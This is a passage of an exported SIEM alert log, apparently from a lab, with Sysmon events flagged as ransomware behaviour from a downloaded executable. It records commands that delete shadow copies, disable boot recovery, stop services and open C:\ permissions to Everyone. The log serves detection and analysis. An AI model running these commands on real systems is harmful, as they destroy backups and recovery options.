{df9fc3d3-d170-5ec7-0000-001030831c00}\r\nProcessId: 6592\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: 
\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:44.288"",""processGuid"":""{df9fc3d3-d170-5ec7-0000-001030831c00}"",""processId"":""6592"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:37:52.929",15,"ATT&CK: WannaCry Ransomware","""Process Create: +RuleName: +UtcTime: 
2020-05-22 13:19:44.143 +ProcessGuid: {df9fc3d3-d170-5ec7-0000-001008771c00} +ProcessId: 4544 +Image: C:\Windows\System32\bcdedit.exe +FileVersion: 10.0.18362.295 (WinBuild.160101.0800) +Description: Boot Configuration Data Editor +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: bcdedit.exe +CommandLine: bcdedit /set {default} recoveryenabled No & bcdedit /set {default} +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=66E4F813624DF01D67CF03616760A7AC,SHA256=1EE229900C128119A122F9A7B3FF8CA2AB35154B314FC6B37CDA6CE041E4277D,IMPHASH=0DEEFF11123C4A14A058E9390224FECE +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","bcdedit /set {default} recoveryenabled No & bcdedit /set {default}","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:44.187554900Z"",""eventRecordID"":""1055"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:44.143\r\nProcessGuid: {df9fc3d3-d170-5ec7-0000-001008771c00}\r\nProcessId: 4544\r\nImage: C:\\Windows\\System32\\bcdedit.exe\r\nFileVersion: 10.0.18362.295 (WinBuild.160101.0800)\r\nDescription: Boot Configuration Data Editor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: bcdedit.exe\r\nCommandLine: 
bcdedit /set {default} recoveryenabled No & bcdedit /set {default}\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=66E4F813624DF01D67CF03616760A7AC,SHA256=1EE229900C128119A122F9A7B3FF8CA2AB35154B314FC6B37CDA6CE041E4277D,IMPHASH=0DEEFF11123C4A14A058E9390224FECE\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:44.143"",""processGuid"":""{df9fc3d3-d170-5ec7-0000-001008771c00}"",""processId"":""4544"",""image"":""C:\\\\Windows\\\\System32\\\\bcdedit.exe"",""fileVersion"":""10.0.18362.295 (WinBuild.160101.0800)"",""description"":""Boot Configuration Data Editor"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""bcdedit.exe"",""commandLine"":""bcdedit /set {default} recoveryenabled No & bcdedit /set {default}"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=66E4F813624DF01D67CF03616760A7AC,SHA256=1EE229900C128119A122F9A7B3FF8CA2AB35154B314FC6B37CDA6CE041E4277D,IMPHASH=0DEEFF11123C4A14A058E9390224FECE"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:37:52.919",15,"ATT&CK T1070 T1490: Shadow Copies Deletion Using Operating Systems 
Utilities","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:44.131 +ProcessGuid: {df9fc3d3-d170-5ec7-0000-001024761c00} +ProcessId: 4564 +Image: C:\Windows\System32\vssadmin.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Command Line Interface for Microsoft® Volume Shadow Copy Service +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: VSSADMIN.EXE +CommandLine: vssadmin.exe Delete Shadows /all /quiet +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=02A10DBF904883B1F8EE9F3CC70F5EB8,SHA256=ACDCC96D628EE8FF7F07FC5D795A05C22EB239BE0D44A9F01727B6124A9619A9,IMPHASH=C1EDC431CD345F0A0F32019895D13FCE +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","vssadmin.exe Delete Shadows /all /quiet","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:44.181938900Z"",""eventRecordID"":""1054"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:44.131\r\nProcessGuid: {df9fc3d3-d170-5ec7-0000-001024761c00}\r\nProcessId: 4564\r\nImage: C:\\Windows\\System32\\vssadmin.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Command Line Interface for Microsoft® Volume Shadow Copy Service \r\nProduct: Microsoft® Windows® Operating System\r\nCompany: 
Microsoft Corporation\r\nOriginalFileName: VSSADMIN.EXE\r\nCommandLine: vssadmin.exe Delete Shadows /all /quiet\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=02A10DBF904883B1F8EE9F3CC70F5EB8,SHA256=ACDCC96D628EE8FF7F07FC5D795A05C22EB239BE0D44A9F01727B6124A9619A9,IMPHASH=C1EDC431CD345F0A0F32019895D13FCE\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:44.131"",""processGuid"":""{df9fc3d3-d170-5ec7-0000-001024761c00}"",""processId"":""4564"",""image"":""C:\\\\Windows\\\\System32\\\\vssadmin.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Command Line Interface for Microsoft® Volume Shadow Copy Service"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""VSSADMIN.EXE"",""commandLine"":""vssadmin.exe Delete Shadows /all /quiet"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=02A10DBF904883B1F8EE9F3CC70F5EB8,SHA256=ACDCC96D628EE8FF7F07FC5D795A05C22EB239BE0D44A9F01727B6124A9619A9,IMPHASH=C1EDC431CD345F0A0F32019895D13FCE"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:37:52.881",15,"ATT&CK: WannaCry 
Ransomware","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:44.121 +ProcessGuid: {df9fc3d3-d170-5ec7-0000-00105b751c00} +ProcessId: 1676 +Image: C:\Windows\System32\icacls.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: iCACLS.EXE +CommandLine: icacls ""C:\*"" /grant Everyone:F /T /C /Q +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=D8B5077F15576983CB8D344F21FD1309,SHA256=3524EDE090FE503A30DEC8F629A74B8F720C9A230E5C4E49A3BB151C8AC1424A,IMPHASH=446163A548337B5BCF2727BCD1CFB399 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","icacls \""C:\\*\"" /grant Everyone:F /T /C /Q","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:44.126885300Z"",""eventRecordID"":""1052"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:44.121\r\nProcessGuid: {df9fc3d3-d170-5ec7-0000-00105b751c00}\r\nProcessId: 1676\r\nImage: C:\\Windows\\System32\\icacls.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: \r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: iCACLS.EXE\r\nCommandLine: icacls \""C:\\*\"" /grant Everyone:F /T /C 
/Q\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=D8B5077F15576983CB8D344F21FD1309,SHA256=3524EDE090FE503A30DEC8F629A74B8F720C9A230E5C4E49A3BB151C8AC1424A,IMPHASH=446163A548337B5BCF2727BCD1CFB399\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:44.121"",""processGuid"":""{df9fc3d3-d170-5ec7-0000-00105b751c00}"",""processId"":""1676"",""image"":""C:\\\\Windows\\\\System32\\\\icacls.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""iCACLS.EXE"",""commandLine"":""icacls \\\""C:\\\\*\\\"" /grant Everyone:F /T /C /Q"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=D8B5077F15576983CB8D344F21FD1309,SHA256=3524EDE090FE503A30DEC8F629A74B8F720C9A230E5C4E49A3BB151C8AC1424A,IMPHASH=446163A548337B5BCF2727BCD1CFB399"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:37:51.390",9,"Windows Application error event","""Faulting application name: svchost.exe, version: 10.0.18362.1, time stamp: 0x32d6c210 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 
+Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0x18c4 +Faulting application start time: 0x01d6303b69281ee2 +Faulting application path: C:\Windows\system32\svchost.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: d644ccdd-df0b-492b-ba8c-f6607f35bff2 +Faulting package full name: +Faulting package-relative application ID: """,, +"May 23, 2020 @ 12:37:47.034",9,"Windows Application error event","""Faulting application name: GameBar.exe, version: 3.38.2002.25003, time stamp: 0x5e5615f2 +Faulting module name: GameBar.exe, version: 3.38.2002.25003, time stamp: 0x5e5615f2 +Exception code: 0xc0000005 +Fault offset: 0x00000000001c3cae +Faulting process id: 0x12dc +Faulting application start time: 0x01d6303b68ab1444 +Faulting application path: C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_3.38.25003.0_x64__8wekyb3d8bbwe\GameBar.exe +Faulting module path: C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_3.38.25003.0_x64__8wekyb3d8bbwe\GameBar.exe +Report Id: 1d222741-e6e1-4216-8237-f3bd684e9c4f +Faulting package full name: Microsoft.XboxGamingOverlay_3.38.25003.0_x64__8wekyb3d8bbwe +Faulting package-relative application ID: App""",, +"May 23, 2020 @ 12:37:46.831",12,"Sysmon - Suspicious Process - explorer.exe","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:38.100 +ProcessGuid: {df9fc3d3-d16a-5ec7-0000-0010c7e11a00} +ProcessId: 1592 +Image: C:\Windows\explorer.exe +FileVersion: 10.0.18362.693 (WinBuild.160101.0800) +Description: Windows Explorer +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: EXPLORER.EXE +CommandLine: explorer.exe /LOADSAVEDWINDOWS +CurrentDirectory: C:\Windows\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=F7DC8A74E30E08B9510380274CFB9288,SHA256=C5E88D778C0B118D49BEF467ED059C09B61DEEA505D2A3D5CA1DCC0A5CDF752F,IMPHASH=FE6F775DD0C72FFD106F56930C60A452 +ParentProcessGuid: {df9fc3d3-d169-5ec7-0000-0010deb21a00} +ParentProcessId: 1140 +ParentImage: C:\Windows\System32\sihost.exe +ParentCommandLine: sihost.exe""","explorer.exe /LOADSAVEDWINDOWS","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:38.106013600Z"",""eventRecordID"":""1004"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:38.100\r\nProcessGuid: {df9fc3d3-d16a-5ec7-0000-0010c7e11a00}\r\nProcessId: 1592\r\nImage: C:\\Windows\\explorer.exe\r\nFileVersion: 10.0.18362.693 (WinBuild.160101.0800)\r\nDescription: Windows Explorer\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: EXPLORER.EXE\r\nCommandLine: explorer.exe /LOADSAVEDWINDOWS\r\nCurrentDirectory: C:\\Windows\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=F7DC8A74E30E08B9510380274CFB9288,SHA256=C5E88D778C0B118D49BEF467ED059C09B61DEEA505D2A3D5CA1DCC0A5CDF752F,IMPHASH=FE6F775DD0C72FFD106F56930C60A452\r\nParentProcessGuid: {df9fc3d3-d169-5ec7-0000-0010deb21a00}\r\nParentProcessId: 1140\r\nParentImage: C:\\Windows\\System32\\sihost.exe\r\nParentCommandLine: sihost.exe\""""},""eventdata"":{""utcTime"":""2020-05-22 
13:19:38.100"",""processGuid"":""{df9fc3d3-d16a-5ec7-0000-0010c7e11a00}"",""processId"":""1592"",""image"":""C:\\\\Windows\\\\explorer.exe"",""fileVersion"":""10.0.18362.693 (WinBuild.160101.0800)"",""description"":""Windows Explorer"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""EXPLORER.EXE"",""commandLine"":""explorer.exe /LOADSAVEDWINDOWS"",""currentDirectory"":""C:\\\\Windows\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=F7DC8A74E30E08B9510380274CFB9288,SHA256=C5E88D778C0B118D49BEF467ED059C09B61DEEA505D2A3D5CA1DCC0A5CDF752F,IMPHASH=FE6F775DD0C72FFD106F56930C60A452"",""parentProcessGuid"":""{df9fc3d3-d169-5ec7-0000-0010deb21a00}"",""parentProcessId"":""1140"",""parentImage"":""C:\\\\Windows\\\\System32\\\\sihost.exe"",""parentCommandLine"":""sihost.exe""}}}" +"May 23, 2020 @ 12:37:42.831",9,"Windows Application error event","""Faulting application name: OneDrive.exe, version: 20.52.311.11, time stamp: 0x95f7bd77 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x832e7bce +Exception code: 0xc0000409 +Fault offset: 0x00088d30 +Faulting process id: 0x179c +Faulting application start time: 0x01d6303b638bb436 +Faulting application path: C:\Users\John Williams\AppData\Local\Microsoft\OneDrive\OneDrive.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: d5d04867-127f-462f-a945-7fbd33b3f724 +Faulting package full name: +Faulting package-relative application ID: """,, +"May 23, 2020 @ 12:37:42.129",9,"Windows Application error event","""Faulting application name: jusched.exe, version: 2.8.241.7, time stamp: 0x5df0d8be +Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000 +Exception code: 0xc0000005 +Fault offset: 0x5b594484 +Faulting process id: 0x1760 +Faulting application start time: 
0x01d6303b5fcacf9a +Faulting application path: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe +Faulting module path: unknown +Report Id: 141e9797-87a5-42c1-b4cf-f8e9ab81c404 +Faulting package full name: +Faulting package-relative application ID: """,, +"May 23, 2020 @ 12:37:41.137",9,"Windows Application error event","""Faulting application name: StartMenuExperienceHost.exe, version: 0.0.0.0, time stamp: 0x5d65fb6a +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0x1028 +Faulting application start time: 0x01d6303b502d106f +Faulting application path: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: 4ea2aed0-dfa4-4504-92f5-5d0618a30e83 +Faulting package full name: Microsoft.Windows.StartMenuExperienceHost_10.0.18362.449_neutral_neutral_cw5n1h2txyewy +Faulting package-relative application ID: App""",, +"May 23, 2020 @ 12:37:41.063",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:32.818 +ProcessGuid: {df9fc3d3-d164-5ec7-0000-001038241a00} +ProcessId: 6444 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d164-5ec7-0000-0010551e1a00} +ParentProcessId: 6356 
+ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:32.823233000Z"",""eventRecordID"":""976"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:32.818\r\nProcessGuid: {df9fc3d3-d164-5ec7-0000-001038241a00}\r\nProcessId: 6444\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d164-5ec7-0000-0010551e1a00}\r\nParentProcessId: 6356\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:32.818"",""processGuid"":""{df9fc3d3-d164-5ec7-0000-001038241a00}"",""processId"":""6444"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net 
Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d164-5ec7-0000-0010551e1a00}"",""parentProcessId"":""6356"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:37:40.980",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:32.509 +ProcessGuid: {df9fc3d3-d164-5ec7-0000-0010551e1a00} +ProcessId: 6356 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900} +ParentProcessId: 5232 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" 8 LAN""","\""C:\\Windows\\System32\\net.exe\"" stop 
